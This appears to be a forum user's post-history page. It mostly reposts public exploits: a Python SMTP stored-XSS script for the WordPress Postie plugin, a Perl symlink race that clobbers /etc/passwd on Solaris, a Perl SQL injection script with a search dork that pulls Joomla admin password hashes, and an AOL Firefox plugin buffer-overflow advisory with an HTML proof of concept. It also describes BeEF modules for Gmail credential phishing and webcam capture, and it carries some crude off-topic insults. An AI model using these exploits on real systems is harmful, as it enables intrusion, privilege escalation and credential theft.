-
Posts
676 -
Joined
-
Last visited
-
Days Won
7
Everything posted by DarkyAngel
-
Wordpress Postie Plugin 1.4.3 Stored XSS [table=width: 500, class: grid] [tr] [td]EDB-ID: 20360[/td] [td]CVE: 2012-2580[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: loneferret[/td] [td]Published: 2012-08-08[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: [/td] [td][/td] [/tr] [/table] #!/usr/bin/python ''' Author: loneferret of Offensive Security Product: Postie Version: 1.4.3 Software Download: http://wordpress.org/extend/plugins/postie/ Timeline: 29 May 2012: Vulnerability reported to CERT 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012 23 Jul 2012: Update received from CERT. Vendor was advised to contact researcher. No other contact received. 08 Aug 2012: Public Disclosure Installed On: Ubuntu Server LAMP 8.04 Wordpress: 3.3.1 Client Test OS: MAC OS Lion Browser Used: Firefox 12 Injection Point: From Injection Payload(s): 1: <BODY ONLOAD=alert('XSS')> 2: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> ''' import smtplib, urllib2 payload = """<BODY ONLOAD=alert('XSS')>""" def sendMail(dstemail, frmemail, smtpsrv, username, password): msg = "From: hacker@offsec.local" + payload + "\n" msg += "To: victim@victim.local\n" msg += 'Date: Today\r\n' msg += "Subject: Offensive Security\n" msg += "Content-type: text/html\n\n" msg += "XSS\r\n\r\n" server = smtplib.SMTP(smtpsrv) server.login(username,password) try: server.sendmail(frmemail, dstemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e) server.quit() username = "hacker@offsec.local" password = "123456" dstemail = "victim@victim.local" frmemail = "hacker@offsec.local" smtpsrv = "172.16.84.171" print "[*] Sending Email" sendMail(dstemail, frmemail, smtpsrv, username, password) Sursa
-
Bypassing antivirus with a sharp syringe Author: Hasan aka inf0g33k Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/20420.pdf
-
te l?s?m pe tine s? începi prima. sper?m s? nu mai revii dup? ban !
-
ce goluri interesante au fost ieri la barce-dinamo // oare plou? mâine?
-
?i tocmai de asta merit? închis topicul. tocmai asta caut? nefututa asta`: aten?ie ! la "munca" î?i bat copii pula de ea, ?i caut? ?i ea un moment de aten?ie online`..
-
Solaris 10 Patch 137097-01 Symlink Attack Privilege Escalation [table=width: 500, class: grid] [tr] [td]EDB-ID: 20418[/td] [td]CVE: N/A[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: Larry Cashdollar[/td] [td]Published: 2012-08-11[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] Source: http://www.securityfocus.com/bid/54919/info Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to gain elevated privileges on affected computers. #!/usr/bin/perl $clobber = "/etc/passwd"; while(1) { open ps,"ps -ef | grep -v grep |grep -v PID |"; while(<ps>) { @args = split " ", $_; if (/inetd-upgrade/) { print "Symlinking iconf_entries.$args[1] to $clobber\n"; symlink($clobber,"/tmp/iconf_entries.$args[1]"); exit(1); } } } Sursa
-
Recently, an updated version – BeEF version 0.4.3.6 – has was made available to us! Changes made to BeEF 0.4.3.6: Twitter and E-mail notifications (thanks @marcwickenden): we have a new extension where you can configure an SMTP server or Twitter account in order to receive automatic notifications as soon as a new browser is hooked in BeEF; HTTPS support (thanks to one of our long-term developers, Christian @xntrik Frichot): you can now start BeEF with full HTTPS support. You should use this when you want to target HTTPS applications, especially if the user is using latest Chrome/Firefox browsers: they do security checks for mixed content and prevent the hook to work in case you use HTTP; New Chrome extension module (thanks Mike Haworth): now you can have screenshots of the current tab the user is in; Gmail phishing and Flash Webcam modules (thanks floyd.ch): using the first module you can logout a user from Gmail, create a fake Gmail login page, then steal the the Google account credentials. With the second module, if the user clicks “Allow Webcam” from the popup created by Flash, you can get photos from his webcam at a defined time interval you can specify; Nat_pinning module (thanks Bart Leppens): you probably remember Samy’s research on the topic. Well, we added this nice attack to BeEF, so you can have fun with it. The GlassFish exploit has been enhanced (again, thanks Bart), and we also added GlassFish fingerprinting to our internal network fingerprinting module. Brendan @_bcoles Coles, as always, did a great job adding new modules and porting various attacks to BeEF: Spring exploit for CVE-2010-1622, lots of XSRF and some RCE modules for various embedded devices like routers and cameras (D-Link dir-615, Linksys wcv series, Cisco E2400, 3Com OfficeConnect ADSL Wireless 11g, Asmax AR-804gu). Other than that, he also added enhanced fingerprinting for various mobile devices, and the balloon dialogs for the admin web-gui. Let @beefproject know if you want more/different stuff in this dialog. Michele @antisnatchor Orru, except from bugfixes, added the confirm_close_tab module, in order to achieve better hook persistence and annoy the user (basically the user is asked for confirmation - in a loop - when he’s closing the hooked tab). Another bunch of changes he worked on were about the AssetHandler (you can now bind/unbind raw sockets in BeEF, useful for example in the nat_pinning module to bind a socket on port 6667), the RESTful API (added a /api/modules/multi endpoint that you can now use to launch multiple modules at once to a single target) and the admin web-gui (added a JSON endpoint that enables you to call the RESTful API from ExtJS) Download BeEF: BeEF 0.4.3.6 - beef-0.4.3.6.zip Sursa
-
[Medium/Hard] Oracle SQL Injection [ Concurs + Premii. ] # 3
DarkyAngel replied to Sheyken's topic in Challenges (CTF)
#prize nr3? -
de asta la categoriile cereri / ajutor ai nevoie de 10 posturi. @edutu20, ai categoria "Sugestii"
-
[Easy/Medium]MySQL Injection Challenge [Concurs cu Premii].
DarkyAngel replied to Sheyken's topic in Challenges (CTF)
#pm sent. -
symlink, e ca un shortcut în windows, "scurteaz? calea spre fi?ier" , tu când accesezi fi?ierul din symlink, acesta nu se afl? în directorul t?u, ci în directorul ini?ial, pe care ai f?cut symlink. ?i termina?i cu offtopicul.
-
Joomla En Masse Component 1.2.0.4 SQL Injection # Exploit Title: Joomla com_enmasse Remote Exploit # Author: Daniel Barragan "D4NB4R" # Español # hola, este exploit afecta sitios de ecommerce por lo cual el exploit solo dara una muestra # de la extraccion posible de datos, No me hago responsable del uso que se le de. ya que es # posible obtener lucro economico por medio del mismo. El script esta hecho con tablas por # defecto de joomla. # English # hi, this exploit affects ecommerce sites so the exploit only give a sample of the # possible extraction of data, I am not responsible for any use that is given. since # it is possible to obtain economic profit through this. the script is done with joomla default tables. #!/usr/bin/perl -w ######################################## # Exploit Title: Joomla com_enmasse Remote Exploit # # Dork: inurl:index.php?option=com_enmasse # # Date: [06-08-2012] # # Author: Daniel Barragan "D4NB4R" # # Twitter: @D4NB4R # # site: http://poisonsecurity.wordpress.com/ # # Vendor: http://www.matamko.com/ # # Version: 1.2.0.4 (last update on Jul 27, 2012) # # License: Enmasse 6 Months Support & Subscription - USD$358.20 # # Demo: http://www.matamko.com/products/filexpress/live-demo.html # # Tested on: [Linux(bt5)-Windows(7ultimate)] # # Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc.... ######################################## print "\t\t\n\n"; print "\t\n"; print "\t Daniel Barragan D4NB4R \n"; print "\t \n"; print "\t Joomla com_enmasse Remote Exploit \n"; print "\t\n\n"; use LWP::UserAgent; print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); $concatene="concat(password)"; $table="jos_users"; $d4nb4r="floor"; $com="com_enmasse"; $seleccione="select"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=".$com."&sortBy=117 and(".$seleccione." 1 from(".$seleccione." count(*),concat((".$seleccione." (".$seleccione." (".$seleccione." ".$concatene." from ".$table." Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C".$d4nb4r."(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/) { print "\n Hash Admin : $1\n\n"; print " El exploit fue exitoso si desea ver mas datos modifique el script\n"; print " The exploit was successful if you want to see more data modify the script\n"; } else{print "\n[-] No se pudo, intente manualmente\n";} #####Daniel Barragan D4NB4R 2012################ Sursa
-
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution tested against: Microsoft Windows Vista sp2 Microsoft Windows Server 2003 r2 sp2 Mozilla Firefox 14.0.1 download url: http://client.web.aol.com/toolbarfiles/Prod/downloads/downloadupdater/dnupdatersetup.exe (this was the update for a previous vulnerability, see ZDI-12-098) see also the installer aol_toolbar_pricecheck.exe url: http://toolbar.aol.com/download_files/download-helper.html?brand=aol&a=111&ncid=txtlnkusdown00000043 vulnerability: the mentioned product installs a Firefox plugin: File: npdnupdater2.dll Version: 1.3.0.0 Name: npdnupdater2 Path: C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll Mime type: applicatiotn/x-vend.aol.dnupdater2.1 Extension: ocp By embedding this plugin inside an html page is possible to trigger a buffer overflow vulnerability through the 'SRC' parameter. Example crash: EAX 00000000 ECX 01101470 EDX 01135208 ASCII "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb" EBX 00000000 ESP 0013F618 EBP 0013F634 ESI 00000002 EDI 0013F668 EIP 61616161 C 1 ES 0023 32bit 0(FFFFFFFF) P 1 CS 001B 32bit 0(FFFFFFFF) A 1 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 1 FS 003B 32bit 7FFDD000(4000) T 0 GS 0000 NULL D 0 O 0 LastErr 00000000 ERROR_SUCCESS EFL 00000297 (NO,B,NE,BE,S,PE,L,LE) ST0 empty 0.0 ST1 empty 0.0 ST2 empty 0.0 ST3 empty 0.0 ST4 empty 0.0 ST5 empty 0.0 ST6 empty 8.0000000000000000000 ST7 empty 0.2500000000000000000 CONST 1/4. 3 2 1 0 E S P U O Z D I FST 0120 Cond 0 0 0 1 Err 0 0 1 0 0 0 0 0 (LT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 Last cmnd 001B:10571FBD xul.10571FBD XMM0 00000000 00000000 00000000 00000000 XMM1 61616161 61616161 61616161 61616161 XMM2 61616161 61616161 61616161 61616161 XMM3 61616161 61616161 61616161 61616161 XMM4 61616161 61616161 61616161 61616161 XMM5 61616161 61616161 61616161 61616161 XMM6 61616161 61616161 61616161 61616161 XMM7 61616161 61616161 61616161 61616161 P U O Z D I MXCSR 00001F80 FZ 0 DZ 0 Err 0 0 0 0 0 0 Rnd NEAR Mask 1 1 1 1 1 1 EIP is overwritten, also EDX points to user-supplied code (this can be done by setting an overlong fake parameter, see poc). As attachment, proof of concept code. a copy loop [*] is involved in overwriting a certain memory region. The subsequent code can be used to call inside this memory region [**]. See npdnupdater2.dll: CPU Disasm Address Hex dump Command Comments 01A91C10 /$ 55 PUSH EBP ; npdnupdater2.01A91C10(guessed Arg1) 01A91C11 |. 56 PUSH ESI 01A91C12 |. 8BE9 MOV EBP,ECX 01A91C14 |. 57 PUSH EDI 01A91C15 |. 8B7C24 10 MOV EDI,DWORD PTR SS:[ARG.1] 01A91C19 |. C745 00 9CA2A MOV DWORD PTR SS:[EBP],OFFSET 01A9A29C 01A91C20 |. 8B07 MOV EAX,DWORD PTR DS:[EDI] 01A91C22 |. 33F6 XOR ESI,ESI 01A91C24 |. 8945 04 MOV DWORD PTR SS:[EBP+4],EAX 01A91C27 |. C645 08 00 MOV BYTE PTR SS:[EBP+8],0 01A91C2B |. C745 10 00000 MOV DWORD PTR SS:[EBP+10],0 01A91C32 |. 66:3977 0A CMP WORD PTR DS:[EDI+0A],SI 01A91C36 |. 7E 3E JLE SHORT 01A91C76 01A91C38 |. EB 06 JMP SHORT 01A91C40 01A91C3A | 8D9B 00000000 LEA EBX,[EBX] 01A91C40 |> 8B4F 0C /MOV ECX,DWORD PTR DS:[EDI+0C] 01A91C43 |. 8B14B1 |MOV EDX,DWORD PTR DS:[ESI*4+ECX] 01A91C46 |. 68 D4A2A901 |PUSH OFFSET 01A9A2D4 ; /Arg2 = ASCII "SRC" 01A91C4B |. 52 |PUSH EDX ; |Arg1 01A91C4C |. E8 E06F0000 |CALL 01A98C31 <------------- ; \npdnupdater2.01A98C31 01A91C51 |. 83C4 08 |ADD ESP,8 01A91C54 |. 85C0 |TEST EAX,EAX 01A91C56 |. 75 15 |JNE SHORT 01A91C6D 01A91C58 |. 8B47 10 |MOV EAX,DWORD PTR DS:[EDI+10] 01A91C5B |. 8B0CB0 |MOV ECX,DWORD PTR DS:[ESI*4+EAX] 01A91C5E |. BA 38CCA901 |MOV EDX,OFFSET 01A9CC38 ; ASCII "aaaa..." 01A91C63 |> 8A01 |/MOV AL,BYTE PTR DS:[ECX] <----------------- [*] 01A91C65 |. 41 ||INC ECX 01A91C66 |. 8802 ||MOV BYTE PTR DS:[EDX],AL 01A91C68 |. 42 ||INC EDX 01A91C69 |. 84C0 ||TEST AL,AL 01A91C6B |.^ 75 F6 |\JNE SHORT 01A91C63 01A91C6D |> 0FBF4F 0A |MOVSX ECX,WORD PTR DS:[EDI+0A] 01A91C71 |. 46 |INC ESI 01A91C72 |. 3BF1 |CMP ESI,ECX 01A91C74 |.^ 7C CA \JL SHORT 01A91C40 01A91C76 |> 5F POP EDI 01A91C77 |. 5E POP ESI 01A91C78 |. 8BC5 MOV EAX,EBP 01A91C7A |. 5D POP EBP 01A91C7B \. C2 0400 RETN 4 01A91C7E CC INT3 01A91C7F CC INT3 01A91C80 /. 8B4424 04 MOV EAX,DWORD PTR SS:[ARG.1] 01A91C84 |. 85C0 TEST EAX,EAX 01A91C86 |. 56 PUSH ESI 01A91C87 |. 8BF1 MOV ESI,ECX 01A91C89 |. 74 09 JE SHORT 01A91C94 01A91C8B |. 8B00 MOV EAX,DWORD PTR DS:[EAX] 01A91C8D |. 85C0 TEST EAX,EAX 01A91C8F |. 8946 0C MOV DWORD PTR DS:[ESI+0C],EAX 01A91C92 |. 75 06 JNE SHORT 01A91C9A 01A91C94 |> 32C0 XOR AL,AL 01A91C96 |. 5E POP ESI 01A91C97 |. C2 0400 RETN 4 01A91C9A |> 57 PUSH EDI 01A91C9B |. 8B3D 0CA1A901 MOV EDI,DWORD PTR DS:[<&USER32.SetWindow 01A91CA1 |. 68 501BA901 PUSH 01A91B50 ; /NewValue = npdnupdater2.1A91B50 01A91CA6 |. 6A FC PUSH -4 ; |Index = GWL_WNDPROC 01A91CA8 |. 50 PUSH EAX ; |hWnd 01A91CA9 |. FFD7 CALL EDI ; \USER32.SetWindowLongA 01A91CAB |. 56 PUSH ESI 01A91CAC |. A3 3CDCA901 MOV DWORD PTR DS:[1A9DC3C],EAX 01A91CB1 |. 8B46 0C MOV EAX,DWORD PTR DS:[ESI+0C] 01A91CB4 |. 6A EB PUSH -15 01A91CB6 |. 50 PUSH EAX 01A91CB7 |. FFD7 CALL EDI 01A91CB9 |. B0 01 MOV AL,1 01A91CBB |. 5F POP EDI 01A91CBC |. 8846 08 MOV BYTE PTR DS:[ESI+8],AL 01A91CBF |. 5E POP ESI 01A91CC0 \. C2 0400 RETN 4 ... 01A98C31 /$ 55 PUSH EBP ; npdnupdater2.01A98C31(guessed Arg1,Arg2) 01A98C32 |. 8BEC MOV EBP,ESP 01A98C34 |. 51 PUSH ECX 01A98C35 |. 53 PUSH EBX 01A98C36 |. E8 C9BDFFFF CALL 01A94A04 ; [npdnupdater2.01A94A04 ... ... CPU Disasm Address Hex dump Command Comments 01A94A04 /$ 53 PUSH EBX ; npdnupdater2.01A94A04(guessed void) 01A94A05 |. 56 PUSH ESI 01A94A06 |. FF15 14A0A901 CALL DWORD PTR DS:[<&KERNEL32.GetLastErr ; [NTDLL.RtlGetLastWin32Error 01A94A0C |. FF35 9CC1A901 PUSH DWORD PTR DS:[1A9C19C] 01A94A12 |. 8BD8 MOV EBX,EAX 01A94A14 |. FF15 BCDDA901 CALL DWORD PTR DS:[1A9DDBC] <------------------------------------- [**] boom! ... ... 01A9DDBC 61 POPAD <--------------boom!! 01A9DDBD 61 POPAD 01A9DDBE 61 POPAD 01A9DDBF 61 POPAD 01A9DDC0 61 POPAD 01A9DDC1 61 POPAD 01A9DDC2 61 POPAD 01A9DDC3 61 POPAD 01A9DDC4 61 POPAD ... PoC: <!-- AOL Products downloadUpdater2 Plugin for Firefox Remote Code Execution File: npdnupdater2.dll Version: 1.3.0.0 Name: npdnupdater2 Path: C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll rgod --> <!-- saved from url=(0014)about:internet --> <EMBED TYPE="applicatiotn/x-vend.aol.dnupdater2.1" SRC="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa